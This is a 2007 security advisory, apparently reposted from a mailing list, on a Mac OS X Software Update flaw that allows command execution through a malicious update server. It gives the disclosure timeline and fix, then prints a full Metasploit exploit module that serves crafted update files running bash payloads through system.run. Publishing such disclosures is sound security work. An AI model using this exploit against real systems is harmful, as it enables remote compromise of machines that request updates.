Tuesday, December 18, 2007

[NEWS] Apple Mac OS X Software Update Command Execution Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

Apple Mac OS X Software Update Command Execution Vulnerability
------------------------------------------------------------------------


SUMMARY

A vulnerability within Apple Mac OS X's Software Update mechanism allows
remote attackers to cause it to execute arbitrary code by creating a
malicious update server.

DETAILS

The OS X Software Update mechanism uses so called `distribution packages'
[1], which basically consist of two parts. The XML `catalog file', which
lists the available updates and the `distribution definition files' [1],
which contain information encoded in XML and JavaScript, defining every
aspect of the user experience, when installing an update.

When OS X checks for new updates, it first contacts swscan.apple.com to
receive the XML catalog file. This file references the distribution
definition files, which can reside on another server. Software Update
receives these files and calls some of the JavaScript functions to check,
if the update is suited for the local machine.

The catalog file and the distribution definition files are both received
using HTTP without any authentication. By running a malicious update
server, it is possible to provide distribution definition files, which
execute arbitrary commands using JavaScript on the remote machine
requesting the update. The System.run() method can be used for this, if
the `allow-external-scripts' option was set in the distribution definition
file, as documented in the "Installer JavaScript Reference" [2].

[1]
<http://developer.apple.com/documentation/DeveloperTools/Reference/DistributionDefinitionRef/> http://developer.apple.com/documentation/DeveloperTools/Reference/DistributionDefinitionRef/
[2]
<http://developer.apple.com/documentation/DeveloperTools/Reference/InstallerJavaScriptRef/> http://developer.apple.com/documentation/DeveloperTools/Reference/InstallerJavaScriptRef/

Impact:
Combined with the ability to intercept requests to the official Apple
update server by other means like ARP or DNS spoofing, it is possible to
execute arbitrary commands on all clients requesting updates. OS X
automatically checks for updates at regular intervals (default is weekly),
which allows for exploitation, even without any user intervention.

Solution:
This vulnerability was fixed with the latest Apple update
APPLE-SA-2007-12-17.

Vendor Response
2007/12/06 - Initial contact with product-security@apple.com
2007/12/06 - Acknowledgment of received report
2007/12/12 - Agreement on public release date
2007/12/17 - Coordinated release of updates and advisory

Proof Of Concept
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf

class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote

include Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X Software Update
Command Execution',
'Description' => %q{
This module exploits a feature in the
Distribution Packages,
which are used in the Apple Software Update
mechanism. This feature
allows for arbitrary command execution through
JavaScript. This exploit
provides the malicious update server. Requests
must be redirected to
this server by other means for this exploit to
work.
},
'Author' => [ 'Moritz Jodeit
<moritz@jodeit.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2007-5863'],
],
'Payload' =>
{
'BadChars' => "\x00",
'DisableNops' => true,
},
'Platform' => 'osx',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [
'unix' ],
'Arch' =>
ARCH_CMD,
},
],
],
'DisclosureDate' => 'Dec 17 2007',
'DefaultTarget' => 0))

register_options(
[
OptPort.new('SRVPORT', [ true, "The local
port to listen on.", 80 ]),
OptString.new('URIPATH', [ true, "The URI
to use for this exploit.", "/" ])
], self.class)
end

# Encode some characters using character entity references and
escape
# any quotation characters, by splitting the string into multiple
parts.
def encode_payload(payload)
encoded = payload.gsub(/[&<>"']/) do |s|
case s
when '&': "&"
when '<': "<"
when '>': ">"
when '"': '"+\'"\'+"'
when '\'': "&apos;"
end
end
return '"' + encoded + '"'
end

# Generate the initial catalog file with references to the
# distribution script, which does the actual exploitation.
def generate_catalog(server)
languages = [ "", "Dutsch", "English", "French", "German",
"Italian", "Japanese",
"Spanish", "da", "fi", "ko", "no", "pt",
"sv", "zh_CN", "zh_TW" ]
productkey = rand_text_numeric(3) + "-" +
rand_text_numeric(4)
distfile = rand_text_alpha(8) + ".dist"

sucatalog = '<?xml version="1.0" encoding="UTF-8"?>'
sucatalog << '<!DOCTYPE plist PUBLIC "-//Apple
Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">'
sucatalog << '<plist version="1.0">'
sucatalog << '<dict>'
sucatalog << '<key>Products</key><dict>'
sucatalog << "<key>#{productkey}</key><dict>"
sucatalog << '<key>Distributions</key><dict>'

languages.each do |l|
sucatalog <<
"<key>#{l}</key><string>http://#{server}/#{distfile}</string>\n"
end

sucatalog << '</dict></dict></dict></dict></plist>'

return sucatalog
end

# Generate distribution script, which calls our payload using
JavaScript.
def generate_dist(payload)
func = rand_text_alpha(8)

dist = '<?xml version="1.0" encoding="UTF-8"?>'
dist << "<installer-gui-script minSpecVersion='1'>"
dist << '<options allow-external-scripts = "yes"/>'
dist << "<choices-outline ui='SoftwareUpdate'>"
dist << "<line choice='su'/>"
dist << "</choices-outline>"
dist << "<choice id='su' visible ='#{func}()'/>"
dist << "<script>"
dist << "function #{func}() { system.run('/bin/bash',
'-c', #{encode_payload(payload)}); }"
dist << "</script>"
dist << "</installer-gui-script>"

return dist
end

def on_request_uri(cli, request)
date = Time.now
server = "swscan.apple.com"

header = {
'Content-Type' => 'text/plain',
'Last-Modified' => date,
'Date' => date,
}

if request.uri =~ /\.sucatalog$/
print_status("Sending initial distribution package
to #{cli.peerhost}:#{cli.peerport}")
body = generate_catalog(server)
elsif request.uri =~ /\.dist$/
print_status("Sending distribution script to
#{cli.peerhost}:#{cli.peerport}")
return if ((p = regenerate_payload(cli)) == nil)
body = generate_dist(p.encoded)
else
return
end
send_response(cli, body, header)
handler(cli)
end

end
end


ADDITIONAL INFORMATION

The information has been provided by <mailto:moritz@jodeit.org> Moritz
Jodeit.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments:

Post a Comment